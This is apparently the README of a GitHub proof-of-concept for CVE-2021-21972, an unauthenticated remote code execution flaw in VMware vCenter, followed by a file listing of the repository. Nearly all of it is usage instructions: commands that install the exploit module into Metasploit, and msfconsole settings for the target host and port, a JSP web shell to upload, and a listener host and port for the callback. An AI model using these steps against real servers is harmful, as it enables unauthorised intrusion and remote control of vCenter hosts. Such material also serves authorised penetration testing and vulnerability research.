CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script# CVE-2021-21972
CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script
# preparation
```zsh
git clone https://github.com/TaroballzChen/CVE-2021-21972
cd CVE-2021-21972
mkdir -p ~/.msf4/modules/exploits/multi/http
cp * ~/.msf4/modules/exploits/multi/http
chmod +x ~/.msf4/modules/exploits/multi/http/vmware_vcenter_server_unauthenticated_file_upload_exploit.py
msfconsole
```
# metasploit usage
```console
set target <target>
set PAYLOAD <payload>
set rfile ~/.msf4/modules/exploits/multi/http/shell1.jsp
set rhost <vuln ip>
set rssl <true for https ; false for http>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
```
# exploit


[4.0K] /data/pocs/45f8efd101b96e7eeef2f8234bbf15917caf4548
├── [550K] 1.png
├── [310K] 2.png
├── [ 34K] LICENSE
├── [ 709] README.md
├── [ 763] shell1.jsp
└── [ 11K] vmware_vcenter_server_unauthenticated_file_upload_exploit.py
0 directories, 6 files